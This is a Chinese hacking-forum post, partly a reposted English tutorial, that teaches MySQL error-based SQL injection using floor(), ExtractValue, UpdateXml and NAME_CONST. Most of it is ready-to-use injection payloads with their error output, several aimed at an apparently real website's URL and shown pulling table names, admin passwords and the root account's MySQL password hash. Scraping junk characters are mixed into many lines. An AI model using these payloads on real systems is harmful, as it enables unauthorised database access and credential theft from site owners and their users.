找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3166|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
' ]6 [# v1 [5 Z2 i2 e+ L0 ?首先进行正常查询:

mysql> select * from article where id = 1;0 ^$ @3 e! ]8 d* R- _5 w# E
+—-+——-+———+
5 _, {9 s+ q0 ^( {& || id | title | content |
0 m; h/ ~! Q8 m/ ~: e9 D, L5 g+—-+——-+———+2 C+ n- b) K0 e& G4 T+ r
|  1 | test  | do it   |
2 \; j9 j* }: g& y6 y. c4 T. V( Y+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
6 d: [! Q3 m; O: z# r$ hERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。! x1 g6 E' B8 m
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);3 `' K6 l  r6 G" @7 ?
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));* [5 _1 d" {* w  g- k9 o
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue& {5 M4 v/ i; u/ M5 X
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
9 b4 P$ j/ }. ~' p9 u/ {- j! wERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

& _2 p0 K! J$ f% i; e, b9 c

- n( f0 M, F9 h+ M

再收集:


( d/ [3 d: l. t, phttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
) R+ ?& X$ ?$ O
3 R. c# e" I/ M) KErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’* m3 O9 t& c8 N0 z" \* p

" ^2 a( p. c  U6 qhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)1 q$ R0 y7 f* j. A
8 `. z+ \2 w4 E$ y; ]6 y$ Z2 \6 P
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
5 p# w6 M4 v- e( b9 T7 f: U/ O# s/ L+ A
MYSQL高版本报错注入技巧-利用NAME_CONST注入' i) z* v1 s" Z% }2 Q# N
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
4 Q8 V2 B$ `. ]- L8 ]7 y1 V0 |0 X# ~' P6 R4 w: x" U
7 N2 _( |1 C1 m+ w, O  L1 L
相关信息& M, g, ~: ]0 q& F- B+ N6 `( z

/ y0 T9 s0 B, \* X, FNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
: {4 a2 @! H: P) P1 ~  d0 Q; ^! D# K5 X* |
Code:
! W6 f$ L  c0 M0 d7 K' KNAME_CONST(DATA, VALUE)
" ~6 G$ p1 Z6 @% S+ n8 w. }9 d2 _* C# W0 ^# T& H
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants./ }; j; G2 |" P; ], f' }

6 n9 I, J3 d4 \3 MSELECT NAME_CONST('TEST', 1)
$ R6 ?7 B1 d6 y. s' a* h
8 Z% o5 \# N- \1 d/ L
! u' A. v& p' h- ^  ?6 I& X8 ^% h4 B' X  H/ A0 Y% A
|---------------|
# a, x8 H" @" e+ {+ N|     TEST      |
  v& D" z  k; B& Y: L; k$ f|               |2 {5 g4 Q/ D( K7 H& Z& s
|---------------|4 Q7 B& A7 W+ X5 M. ]
|       1       |
! \# t% C* f) _# Y/ r! T7 ^|               |0 M4 I" O0 E- g$ C: r
|---------------|
$ T3 k5 p( D8 {' i/ L; I

  y, r" V4 _( K1 O' r$ v' [* f4 F
1 m7 Z7 F! O1 z0 F) y1 V
' d* M9 k5 }) l# J4 ]: ~7 P- X
http://dev.mysql.com/doc/refman/5.0/en/m...name-const# \* y3 J! t3 }! L0 D7 C
Intro to MySQL Variables
. j% m+ C. L# ^7 [. c4 A. _
2 m9 a* K. M& W' G, YOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.: e1 C6 s& ?4 {& e- Q8 S

/ Q7 i, z7 U4 u8 ~. p" LCode:- ?) i3 R2 n6 G8 V: W
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
7 R: ?+ m! ]; J4 e- H! |2 ?( g* t
: X. q0 Z; ^, n; B' _* W
7 Z1 x6 \, `- l
. S8 {  m/ k/ @! d3 Z. E/ `

: h3 @8 g7 f- s. J6 H4 k! t* o* ?( q- m% s2 }# i6 i- Y
Code:0 V) `6 [$ Z( b) C' h2 L
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
/ Y) [$ }# d8 V+ O8 i9 ~- P

0 q4 P7 i* l' N5 ^
5 X8 |! M) b7 Q+ ]: P+ kVAR = Your MySQL variable.( c. r( j5 a; X# d

  C7 }8 L8 Y! |. NMySQL 5.1.3 Server System Variables% b3 {, ~5 P! g  h0 j6 V2 b
; J; O; [& W9 w* D' l, `0 ?& |0 k, [
Let's try it out on my site..
# r% N. {( v8 z$ Y  `* a& b! M; W1 j# B; c4 S' u/ y5 r
Code:
6 }, `! N$ Q' J6 ?* h! U3 b9 Qhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
* H: e4 R+ @: A; b6 H* H; x. S: R- J$ x! }9 |$ s5 A
Erroruplicate column name '5.0.27-community-nt'
! H. V# M6 R9 I( a" k* v. ~
$ ^: y9 O9 B9 n5 [
2 B) C0 M9 N* g" b: Z" i) o: I. h" Y
. H% E; P2 E& h0 r

/ m- _5 L" L' P4 u0 o& }" P) M# R
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
( U2 I& q4 ~  c) U* B* V7 j. p4 W( ^* H" }
Data Extraction' R. h) |& B6 c. |
0 c9 O: @0 K/ d/ y7 ?6 P3 u3 n. N
Code:
) z+ c' K, z' p! F# E+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
& E. F& g9 u' g2 ?

1 I. ?1 H& }7 ?8 e
" p# P9 O7 I1 J$ [) s; c/ E% L( i' lWe should get a duplicate column 1 error...! k6 ?% _/ q/ M# \" y
0 V* o% ^$ T! p4 ?$ \
Code:' `- T. t- V" F! p7 c$ {
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--& p' G  v2 L) s
, f# ~5 C- h7 M7 i$ C
Erroruplicate column name '1
8 g# f& ~# L1 n. y' o; r/ u( X
* Z5 _$ N/ T* ^* \$ H9 H' h$ t. O
% D* M9 M' {& U8 q
0 n+ P3 O( f* C# n- \  A3 e
, H' r& D+ M% R7 x/ p, g, E

3 |3 Q& M$ Q5 |
; C; I. l+ l  RNow let's get the tables out this bitch..1 A+ O2 @2 q# h4 M+ ~

6 g: u! E3 u, ~  c" Y8 QCode:0 ~! b( ]0 I- s, ^9 Z' _
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--2 Z# v9 G2 @- t1 R) O
5 u4 y# q4 h& Z; W0 b
! b3 ]2 N& t+ z* u; y
Let's see if it works here, if it does, we can go on and finish the job.7 r1 o: H6 H, z) u, O

% I$ r1 b6 {! [Code:1 w. p! C: j4 I" I& {3 B$ O
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
+ R( |  G6 q2 v& x/ j
1 o) C! B7 G! {7 p7 B$ n: \0 J9 h( Z6 s) {1 Z
Erroruplicate column name 'com_admanage
- Z, R3 N6 \. @) h! d8 ^2 b

9 p4 d: B/ ]3 l3 Q$ D  X- z# R/ q+ G6 R7 Y8 k9 k' d

2 Q5 O  {- y( G7 l5 V; d5 M% b1 c5 n- |2 D8 M

' S8 q$ N+ d5 k) g9 @. a" M9 P9 i, F* q, g
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
0 }" F- a  c7 d0 ?8 ^- i. B2 X8 x  n5 x' y1 _# D1 E1 |/ J
Let's get the columns out of the user table..
5 Y; j6 p- r# @, n) R# ^& Z! q! a+ c% t' ^9 u
Code:
9 q& {9 E" w9 g/ X$ S+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--; y# _# Q9 y5 d( S0 t- e: R2 f

- Z& E' T& L& G% o+ g
" v2 [, p( f% p9 USo mine looks like this, and I get the duplicate column name 'Host'.
8 _1 o+ ~# N$ ]# S* o! Q7 Z" V# n! s2 ~; e; X& a: K' m
Code:8 |9 `# z8 |) t7 ~$ ?6 A
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
' `- d. O* \4 ]- j6 E- p8 ]1 h4 h; @5 ~' ]& p* o& ]
Erroruplicate column name 'Host'
  i; w' {6 H* n4 m5 N- d8 y5 C

+ D0 G3 z0 v6 I0 d6 W" j& S9 [; q8 U
" P0 r# o6 j6 a; S( y6 h
/ O% \8 X2 |4 Y7 k% B. f2 X' h
6 @7 {! N  Z! m- F5 O( a% f2 \

' K8 @6 H- f  k' |6 VWoot, time to finish this bitch off.
; P% I8 k3 \. ^$ T0 S$ Q9 o$ L: p. e0 z
Code:7 Y# C9 w' m- K6 v% F: A; I) v
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--9 T4 P9 F  k2 j! T* i  n) h8 j
* b  ~9 c, Q# h) w

$ o4 B+ i1 z0 d6 eSo mine looks like this...
8 E7 s2 \# b; ?/ \# T
8 h7 u  c1 f5 m4 d3 o3 wCode:
; u: b9 J3 a: D( Yhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--  z+ M  R2 ]2 l8 r+ d5 {
7 K" v' Z% G9 t4 e) U  f
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
% M& E, t* b  {  _+ T

$ D) J$ |5 `) m( |
+ T, U, Y: r, }: a! H! s
/ U% W3 F7 [4 x" u( X9 f/ `. q$ G3 _& O
; H/ k1 m8 @9 }' K
' Q( R% ?: b, }: s+ V8 q
And there we have it, thanks for reading.
! b3 b+ d% C. y

* y% r' B0 C; t4 Q3 p7 }5 a6 a4 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表